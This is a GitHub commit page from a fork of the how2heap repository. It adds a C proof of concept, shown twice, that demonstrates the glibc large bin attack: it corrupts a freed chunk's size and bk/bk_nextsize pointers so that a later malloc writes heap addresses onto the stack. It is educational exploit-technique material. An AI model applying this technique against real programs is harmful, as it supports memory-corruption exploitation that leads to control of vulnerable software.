forked from shellphish/how2heap
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
added POC for large bin attack and updated Makefile
- Loading branch information
Sajjad Arshad
committed
Sep 27, 2018
1 parent
e53e502
commit 37b71d0
Showing
3 changed files
with
144 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,71 @@ | ||
| #include<stdio.h> | ||
| #include<stdlib.h> | ||
|
|
||
| int main() | ||
| { | ||
| fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n"); | ||
| fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the " | ||
| "global variable global_max_fast in libc for further fastbin attack\n\n"); | ||
|
|
||
| unsigned long stack_var1 = 0; | ||
| unsigned long stack_var2 = 0; | ||
|
|
||
| fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n"); | ||
| fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1); | ||
| fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2); | ||
|
|
||
| unsigned long *p1 = malloc(0x320); | ||
| fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", p1 - 2); | ||
|
|
||
| fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with" | ||
| " the first large chunk during the free()\n\n"); | ||
| malloc(0x20); | ||
|
|
||
| unsigned long *p2 = malloc(0x400); | ||
| fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", p2 - 2); | ||
|
|
||
| fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with" | ||
| " the second large chunk during the free()\n\n"); | ||
| malloc(0x20); | ||
|
|
||
| unsigned long *p3 = malloc(0x400); | ||
| fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", p3 - 2); | ||
|
|
||
| fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with" | ||
| " the third large chunk during the free()\n\n"); | ||
| malloc(0x20); | ||
|
|
||
| free(p1); | ||
| free(p2); | ||
| fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:" | ||
| " %p --> %p\n\n", (void *)(p2 - 2), (void *)(p1 - 2)); | ||
|
|
||
| malloc(0x90); | ||
| fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the" | ||
| " freed second large chunk into the large bin, use parts of the freed first large chunk for allocation, and" | ||
| " reinsert the remaining of the freed first large chunk into the unsorted bin:" | ||
| " %p\n\n", (void *)((char *)p1 + 0x90)); | ||
|
|
||
| free(p3); | ||
|
|
||
| //------------VULNERABILITY----------- | ||
|
|
||
| fprintf(stderr, "Now emulating a vulnerability that can overwrite the freed second large chunk's \"size\"" | ||
| " as well as its \"bk\" and \"bk_nextsize\" pointers\n"); | ||
|
|
||
| p2[-1] = 0x3f1; | ||
| p2[0] = 0; | ||
| p2[2] = 0; | ||
| p2[1] = (unsigned long)(&stack_var1 - 2); | ||
| p2[3] = (unsigned long)(&stack_var2 - 4); | ||
|
|
||
| //------------------------------------ | ||
|
|
||
| malloc(0x90); | ||
|
|
||
| fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:\n"); | ||
| fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1); | ||
| fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2); | ||
|
|
||
| return 0; | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,71 @@ | ||
| #include<stdio.h> | ||
| #include<stdlib.h> | ||
|
|
||
| int main() | ||
| { | ||
| fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n"); | ||
| fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the " | ||
| "global variable global_max_fast in libc for further fastbin attack\n\n"); | ||
|
|
||
| unsigned long stack_var1 = 0; | ||
| unsigned long stack_var2 = 0; | ||
|
|
||
| fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n"); | ||
| fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1); | ||
| fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2); | ||
|
|
||
| unsigned long *p1 = malloc(0x320); | ||
| fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", p1 - 2); | ||
|
|
||
| fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with" | ||
| " the first large chunk during the free()\n\n"); | ||
| malloc(0x20); | ||
|
|
||
| unsigned long *p2 = malloc(0x400); | ||
| fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", p2 - 2); | ||
|
|
||
| fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with" | ||
| " the second large chunk during the free()\n\n"); | ||
| malloc(0x20); | ||
|
|
||
| unsigned long *p3 = malloc(0x400); | ||
| fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", p3 - 2); | ||
|
|
||
| fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with" | ||
| " the third large chunk during the free()\n\n"); | ||
| malloc(0x20); | ||
|
|
||
| free(p1); | ||
| free(p2); | ||
| fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:" | ||
| " %p --> %p\n\n", (void *)(p2 - 2), (void *)(p1 - 2)); | ||
|
|
||
| malloc(0x90); | ||
| fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the" | ||
| " freed second large chunk into the large bin, use parts of the freed first large chunk for allocation, and" | ||
| " reinsert the remaining of the freed first large chunk into the unsorted bin:" | ||
| " %p\n\n", (void *)((char *)p1 + 0x90)); | ||
|
|
||
| free(p3); | ||
|
|
||
| //------------VULNERABILITY----------- | ||
|
|
||
| fprintf(stderr, "Now emulating a vulnerability that can overwrite the freed second large chunk's \"size\"" | ||
| " as well as its \"bk\" and \"bk_nextsize\" pointers\n"); | ||
|
|
||
| p2[-1] = 0x3f1; | ||
| p2[0] = 0; | ||
| p2[2] = 0; | ||
| p2[1] = (unsigned long)(&stack_var1 - 2); | ||
| p2[3] = (unsigned long)(&stack_var2 - 4); | ||
|
|
||
| //------------------------------------ | ||
|
|
||
| malloc(0x90); | ||
|
|
||
| fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:\n"); | ||
| fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1); | ||
| fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2); | ||
|
|
||
| return 0; | ||
| } |